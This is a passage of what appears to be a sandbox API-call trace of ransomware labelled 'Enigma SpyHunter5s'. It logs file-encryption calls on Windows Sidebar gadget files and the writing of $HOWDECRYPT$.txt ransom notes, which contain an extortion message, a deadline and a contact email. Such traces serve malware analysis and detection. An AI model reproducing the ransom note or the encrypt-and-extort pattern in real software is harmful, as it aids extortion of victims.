hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8d8 | out: pbBuffer=0x248e8d8) returned 1 [0161.278] GetProcessHeap () returned 0x2c0000 [0161.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.278] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8d0*=0x30) returned 1 [0161.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.281] GetProcessHeap () returned 0x2c0000 [0161.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.282] GetProcessHeap () returned 0x2c0000 [0161.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b3f0 | out: hHeap=0x2c0000) returned 1 [0161.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8d0 | out: pbBuffer=0x248e8d0) returned 1 [0161.282] GetProcessHeap () returned 0x2c0000 [0161.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0161.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e8c8*=0x30) returned 1 [0161.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.293] GetProcessHeap () returned 0x2c0000 [0161.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0161.293] GetProcessHeap () returned 0x2c0000 [0161.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b010 | out: hHeap=0x2c0000) returned 1 [0161.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.402] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.402] WriteFile (in: hFile=0x178, lpBuffer=0x248e803*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e92c, lpOverlapped=0x0 | out: lpBuffer=0x248e803*, lpNumberOfBytesWritten=0x248e92c*=0x127, lpOverlapped=0x0) returned 1 [0161.403] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.403] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e92c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e92c*=0x2ac, lpOverlapped=0x0) returned 1 [0161.403] CloseHandle (hObject=0x178) returned 1 [0161.403] GetProcessHeap () returned 0x2c0000 [0161.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb03b8 | out: hHeap=0x2c0000) returned 1 [0161.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8c8 | out: pbBuffer=0x248e8c8) returned 1 [0161.404] GetProcessHeap () returned 0x2c0000 [0161.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8c0*=0x30) returned 1 [0161.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-left.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.421] GetProcessHeap () returned 0x2c0000 [0161.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.421] GetProcessHeap () returned 0x2c0000 [0161.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c88d20 | out: hHeap=0x2c0000) returned 1 [0161.421] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8c8 | out: pbBuffer=0x248e8c8) returned 1 [0161.421] GetProcessHeap () returned 0x2c0000 [0161.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.421] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8c0*=0x30) returned 1 [0161.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\localizedStrings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\localizedstrings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.443] GetProcessHeap () returned 0x2c0000 [0161.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.444] GetProcessHeap () returned 0x2c0000 [0161.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c887f8 | out: hHeap=0x2c0000) returned 1 [0161.444] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8c0 | out: pbBuffer=0x248e8c0) returned 1 [0161.444] GetProcessHeap () returned 0x2c0000 [0161.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.444] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8b8*=0x30) returned 1 [0161.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\js\\init.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\js\\init.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.451] GetProcessHeap () returned 0x2c0000 [0161.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.451] GetProcessHeap () returned 0x2c0000 [0161.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a498 | out: hHeap=0x2c0000) returned 1 [0161.452] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8c0 | out: pbBuffer=0x248e8c0) returned 1 [0161.452] GetProcessHeap () returned 0x2c0000 [0161.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.452] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8b8*=0x30) returned 1 [0161.452] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\glass.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\glass.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.461] GetProcessHeap () returned 0x2c0000 [0161.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.461] GetProcessHeap () returned 0x2c0000 [0161.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec510 | out: hHeap=0x2c0000) returned 1 [0161.462] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8b8 | out: pbBuffer=0x248e8b8) returned 1 [0161.462] GetProcessHeap () returned 0x2c0000 [0161.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.462] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8b0*=0x30) returned 1 [0161.462] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dialdot_lrg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\dialdot_lrg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.522] GetProcessHeap () returned 0x2c0000 [0161.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.523] GetProcessHeap () returned 0x2c0000 [0161.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87620 | out: hHeap=0x2c0000) returned 1 [0161.523] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8b8 | out: pbBuffer=0x248e8b8) returned 1 [0161.523] GetProcessHeap () returned 0x2c0000 [0161.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.523] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8b0*=0x30) returned 1 [0161.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.537] GetProcessHeap () returned 0x2c0000 [0161.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.537] GetProcessHeap () returned 0x2c0000 [0161.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec340 | out: hHeap=0x2c0000) returned 1 [0161.537] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8b0 | out: pbBuffer=0x248e8b0) returned 1 [0161.537] GetProcessHeap () returned 0x2c0000 [0161.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.537] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8a8*=0x30) returned 1 [0161.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\cpu.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.550] GetProcessHeap () returned 0x2c0000 [0161.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.550] GetProcessHeap () returned 0x2c0000 [0161.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec088 | out: hHeap=0x2c0000) returned 1 [0161.550] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8b0 | out: pbBuffer=0x248e8b0) returned 1 [0161.550] GetProcessHeap () returned 0x2c0000 [0161.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.550] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8a8*=0x30) returned 1 [0161.550] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.705] GetProcessHeap () returned 0x2c0000 [0161.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.705] GetProcessHeap () returned 0x2c0000 [0161.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eafab8 | out: hHeap=0x2c0000) returned 1 [0161.705] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8a8 | out: pbBuffer=0x248e8a8) returned 1 [0161.705] GetProcessHeap () returned 0x2c0000 [0161.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.705] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8a0*=0x30) returned 1 [0161.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.738] GetProcessHeap () returned 0x2c0000 [0161.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.738] GetProcessHeap () returned 0x2c0000 [0161.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf9b8 | out: hHeap=0x2c0000) returned 1 [0161.738] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8a8 | out: pbBuffer=0x248e8a8) returned 1 [0161.738] GetProcessHeap () returned 0x2c0000 [0161.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.738] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e8a0*=0x30) returned 1 [0161.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\system_dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.743] GetProcessHeap () returned 0x2c0000 [0161.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.743] GetProcessHeap () returned 0x2c0000 [0161.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c87240 | out: hHeap=0x2c0000) returned 1 [0161.743] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8a0 | out: pbBuffer=0x248e8a0) returned 1 [0161.743] GetProcessHeap () returned 0x2c0000 [0161.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.743] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e898*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e898*=0x30) returned 1 [0161.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\square_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\square_h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.766] GetProcessHeap () returned 0x2c0000 [0161.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.766] GetProcessHeap () returned 0x2c0000 [0161.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed0f90 | out: hHeap=0x2c0000) returned 1 [0161.767] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e8a0 | out: pbBuffer=0x248e8a0) returned 1 [0161.767] GetProcessHeap () returned 0x2c0000 [0161.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.767] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e898*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e898*=0x30) returned 1 [0161.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.831] GetProcessHeap () returned 0x2c0000 [0161.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.831] GetProcessHeap () returned 0x2c0000 [0161.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86f58 | out: hHeap=0x2c0000) returned 1 [0161.831] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e898 | out: pbBuffer=0x248e898) returned 1 [0161.831] GetProcessHeap () returned 0x2c0000 [0161.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.831] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e890*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e890*=0x30) returned 1 [0161.831] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_settings.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.868] GetProcessHeap () returned 0x2c0000 [0161.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.868] GetProcessHeap () returned 0x2c0000 [0161.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf4b8 | out: hHeap=0x2c0000) returned 1 [0161.868] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e898 | out: pbBuffer=0x248e898) returned 1 [0161.869] GetProcessHeap () returned 0x2c0000 [0161.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0161.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e890*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e890*=0x30) returned 1 [0161.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.877] GetProcessHeap () returned 0x2c0000 [0161.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0161.877] GetProcessHeap () returned 0x2c0000 [0161.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86988 | out: hHeap=0x2c0000) returned 1 [0161.877] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.898] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.898] WriteFile (in: hFile=0x178, lpBuffer=0x248e7c7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e8f0, lpOverlapped=0x0 | out: lpBuffer=0x248e7c7*, lpNumberOfBytesWritten=0x248e8f0*=0x127, lpOverlapped=0x0) returned 1 [0161.899] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.899] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e8f0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e8f0*=0x2ac, lpOverlapped=0x0) returned 1 [0161.899] CloseHandle (hObject=0x178) returned 1 [0161.899] GetProcessHeap () returned 0x2c0000 [0161.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaf0b8 | out: hHeap=0x2c0000) returned 1 [0161.900] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.971] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.971] WriteFile (in: hFile=0x178, lpBuffer=0x248e7c3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e8ec, lpOverlapped=0x0 | out: lpBuffer=0x248e7c3*, lpNumberOfBytesWritten=0x248e8ec*=0x127, lpOverlapped=0x0) returned 1 [0161.972] lstrlenA 